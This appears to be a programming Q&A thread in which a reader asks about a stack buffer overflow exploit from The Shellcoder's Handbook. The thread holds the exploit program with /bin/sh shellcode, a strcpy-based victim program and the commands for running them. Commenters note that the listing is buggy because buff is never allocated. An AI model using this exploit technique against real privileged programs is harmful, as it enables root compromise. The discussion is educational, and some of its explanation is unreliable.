# What exactly does this program mean? (Shellcoder's Handbook)

Tags: c, shellcode

Recently I was reading shellcoders handbook and this example I came across was kind of confusing to me. I was partially able to decode its meaning but not completely. I have added comments where I understood what it means and have also added comments to areas where I don't understand what the author is trying to accomplish. Could someone kindly please tell me how this first c program works?

```
#include <stdlib.h>

#define offset_size                    0
#define buffer_size                    512

char sc[] = 
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
  "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";


unsigned long find_start(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) 
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=offset_size, bsize=buffer_size;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  addr = find_start() - offset; //esp-offset. Esp acquired from inline assembly
  printf("Attempting address: 0x%x\n", addr);

  ptr = buff; // ???? buff is a random memory address within the progam. Why make ptr equal to buff?
  addr_ptr = (long *) ptr; //typecasting to long pointer and assigning it to the random memory address, but why?
  for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr; // Fill bsize worth of stack memory with address, possibly to overwrite EIP on return from main

  ptr += 4; // why add ptr by 4? I mean I know each stack space is worth 4 units but considering ptr is a random memory address why add it by 4?

   for (i = 0; i < strlen(sc); i++)
           *(ptr++) = sc[i]; // place shellcode at ptr's address

   buff[bsize - 1] = '\0'; // no clue why this is used? Probably terminating shellcode? Or for marking end of buffer using \0

   memcpy(buff,"BUF=",4); // copy memory 4 units equivalent of BUF=
   putenv(buff); // linux environment variable stuff. Not really sure.
   system("/bin/bash"); // no idea what this does.
 }
```

Also the text before this mentions that its for gaining root access to a shell in linux. It works if a process is being run with root privileges, does this mean, the buffer overflows to another process' instructions? Which shouldn't be possible but I just wanted to confirm it. If not how does it gain root privileges to a shell or a root shell?

```
[jack@0day local]$ ./attack 500
Attempting address: 0xbfffd768 
[jack@0day local]$ ./victim $BUF
```

This is how it shows up on the command line and the author launches victim.c with root privilege.

The victim.c source code is as follows :

```
int main(int argc,char *argv[]) {
char little_array[512]; 
if (argc > 1) 
strcpy(little_array,argv[1]); }
```

Comment: This happens to be a program to check the offset between the start of the program and the address of shellcode by a trial and error method.

Comment: Is that the answer, or is that the description and you're looking for details? Also, how old is this book?

Comment: Please make yourself the effort of using an ASCII table to translate the hex represetnations to a character sequence.

Comment: I want to understand how the first program works. I don't need to understand the shellcode as someone posted in the answers. In case you want to know what the shellcode does, its to open a shell in linux. The book is from 2004. Couldn't get my hands on the new edition. Also want to know what the BUF means in the command line. And if that BUF and BUF from the first program are related and how?

Comment: Josh, could you explain what the first program does? That would be really helpful!

Comment: @JoshDetwiler The shell code is just the payload to execute. The rest of the program is smashing the stack to inject that payload.

Comment: Kindly elaborate line by line please?

Comment: This code has ***a lot*** of bugs. So many that I found [a whole blog dedicated to errata](https://shellcoders.blogspot.com). I tried to work out what's going on, even with a copy of the book I found, but gave up.

Answer (score 2):

So, I finally was able to find out the meaning of the entire code, although I feel that the author has made certain assumptions while writing the code. I will explain them along the way. Feel free to correct me if you feel that at a certain point my explanation is wrong.

```
#include <stdlib.h>

#define offset_size                    0
#define buffer_size                    512

char sc[] = 
 "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
  "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
```

This first bit of code includes the standard library head for C. Although it isn't used here, its just a general norm of the book to include it in every bit of code provided.
The author defines the offset size and buffer size. These will turn out to be the default values for offset size/buffer size if there is no input provided by the user in command line as we will notice in the code mentioned below. Also the author claims that the shellcode will run a Linux terminal.

```
unsigned long find_start(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) 
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=offset_size, bsize=buffer_size;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  addr = find_start() - offset; //esp-offset. Esp acquired from inline assembly
  printf("Attempting address: 0x%x\n", addr);
```

Till this point in the code, we have a `find_start()` program which moves the `esp` register value to `eax` register. The value of `eax` is then returned. So in short, this code is meant to find the current stack pointer location.

In main we see a few pointers being defined. Next we see that the author assigns `buffer_size` to `bsize` as a default case scenario, and the same happens with `offset` and `offset_size`. Next the `argc` value is checked, which basically means if there are more than 1 input, then the first input will be `bsize` and the second input will be `offset`respectively.

For the next bit of code, I'll use the following diagram to explain the concept : 
[image: Memory Diagram]
[image: Concept of function calls in stack]
As we can see, the stack is suppose to grow downwards, although this depends on the architecture, the book assumes it grow downwards.

```
addr = find_start() - offset;
printf("Attempting address: 0x%x\n", addr);
```

The first line means `addr` is set to the the value of `esp` - `the defined offset value` of where our shellcode resides in memory (We will look into this in the next section). Here is where the first assumption that the author makes comes in, the author assumes that every time the program is run, the same amount of stack space will be assigned to find_start() and hence `esp - offset` will remain the same. This value is then printed out.

```
  ptr = buff;
  addr_ptr = (long *) ptr; 
  for (i = 0; i < bsize; i+=4)
        *(addr_ptr++) = addr; 

  ptr += 4; 

   for (i = 0; i < strlen(sc); i++)
           *(ptr++) = sc[i];
```

`ptr` is made equal to buff which is further cast to `long *` and made equal to `addr_ptr`. What this basically tries to achieve is that, since `buff` is in the stack memory of `main()`, it will point to a random location in `main()` memory. Note that this memory location that `buff` points to is greater than the memory address of `find_start()` stack memory. Hence `buff` will be greater than `addr`.
From this point in the memory, we will write the address of the starting position of the shellcode in our stack memory till the assigned `bsize` in increments of `4`. The increment of 4 is because each unit of stack memory is worth 4 bytes in 32-bit systems.
`ptr` is then incremented by 4 to point to the next higher location in stack memory. Why we do this is is covered in the next section.
Next we increment `ptr` and write the shellcode to the memory, overwriting the previously written `addr` whenever necessery. The place where the last char of `sc` is written in memory is the starting address of the shellcode. `addr` should be equivalent to this address, we can do this by trying out different `offsets` and `buffer sizes` or by examining the memory layout of the program while it is running by setting breakpoints.

```
buff[bsize - 1] = '\0'; 

   memcpy(buff,"BUF=",4); 
   putenv(buff); 
   system("/bin/bash");
```

The last byte of buffer is made equal to `\0` to mark the end of input. Previously we incremented the `ptr` by 4, this was to make space at the location of `buff` for 4 bytes of data equivalent to `BUF=` which is helping us set the environment variable. `putenv(buff)` makes it look like `BUF=(SHELLCODE-REGION)+(MEMORY ADDRESS TO START OF SHELL CODE REGION)+\0`. Hence `BUF` is an environment variable consisting of this long string. `system("bin/bash")` is then executed which pretty much launches the linux command line as far as I know, but I'm not certain about the same.

Next comes the using this environment variable part.

```
[jack@0day local]$ ./attack 500
Attempting address: 0xbfffd768 
[jack@0day local]$ ./victim $BUF
```

This means the `attack` is run with `buffer size 500` which generates an environment variable `BUF`. This `BUF` is then tested against the `victim` program. How this is suppose to work is, if we recall, the last part of the `BUF` string consists of the memory address of the first shellcode instruction. So, this part is suppose to overwrite the value of `EBP` and `RET` shown in the figure above. The program when returning will use the address at `RET` and launch the shellcode which is suppose to launch a linux terminal, since victim was running as `root`, the shellcode starts a terminal as `root` as well.

There is an important point to this program : Multiple values of `bsize` and `offset` need to be tried to to finally find a value which works for `victim.c`. Secondly, this happens because in victim, an `strcpy()` is used, which doesn't check for the size of string to copy and if it fits within the array, it juts writes to memory locations pointed by the array. Also, as `ESP` resides at the lowest part of memory and fills it up upwards while a program is executing, if data is passed which is larger than the allocated stack space, `RET` and `EBP` and maybe even more are overwritten by the passed data.

Kindly comment if there are any errors in the explanation. I tried to explain it for a future reference for myself in case I forget what this program does and also for others struggling to understand what this program is actually trying to do.

Comment: Thats all reasonable *except* the knack of it all: `buf` is never initialized, and you cannot assume *anything* about its contents. Its value might get initialized to 0 or point into a non-writable page causing immediat SEGFAULT when attempting to write to `addr_ptr`. Perhaps some *specific* Linux kernel/arch/ Compiler version combination is assumed that causes the content of `buf` to satisfy certain constraints?

Comment: I refer to the part: "since buff is in the stack memory of main(), it will point to a random location in main() memory. Note that this memory location that buff points to is greater than the memory address of find_start() stack memory. "

Comment: Its suppose to be running on Red Hat 9.0. Not sure if variables work without initialization in any distro though. Hence the most plausible approach was what I mentioned.

Comment: If the code said `ptr = &buf;` I would agree. But with `ptr=buf;` what `ptr` is assigned is not the *address* of `buf`, but its content. `buf` lies somewhere in the stack frame of `main`, but its content is totally undefined. It could be any value from 0 through whatever is the max on your archictecture. How do you know , that "this memory location that buff points to is greater than the memory address of find_start() stack memory. " ? `buf` could point to `0x0`, and that is definitely *not* greater than the address of `find_start` no matter what the address of `find_start` would be.

Comment: As you mentioned buf lies in main's stack frame. Now we are not concerened with what its value is because we will overwrite the value. Just that it lies in mains stack frame. Main calls find_start. So any functions stack frame which is called from main is much below in memory address compared to variables defined in main. Hence my conclusion :)

Comment: Also, assuming that buff can't point to a memory location outside the stack frame of main

Comment: Well, all I See here: `ptr = buff;  addr_ptr = (long *) ptr;  for (i = 0; i < bsize; i+=4) *(addr_ptr++) = addr;` is the (undefined) *value* of `buff` being used as address were it is written to. `buff` is nowhere before overeritten, is it? As I said, if the first line read `ptr = &buff;` I would agree, but the line read `ptr=buff;`. ?

Comment: [As noted in this blog post](https://shellcoders.blogspot.com/2010/08/chapter-2-using-exploit-pp-31-38.html) there's a missing block of code. `buff` is supposed to be allocated heap memory. There's a very similar, improved program that immediately follows in the book (it uses NOPs to pad the payload so you don't need to be so exact in finding RET) which allocates memory for `buff`.

Comment: @Schwern Thanks, this enlightens the entire matter a lot :)

Comment: Note: `buff[]` is an array, in C, when referencing an array name, the result is the address of the first byte in the array

Comment: Thanks to all of you for correcting my mistakes and making my explanation more relevant for any future readers of this post!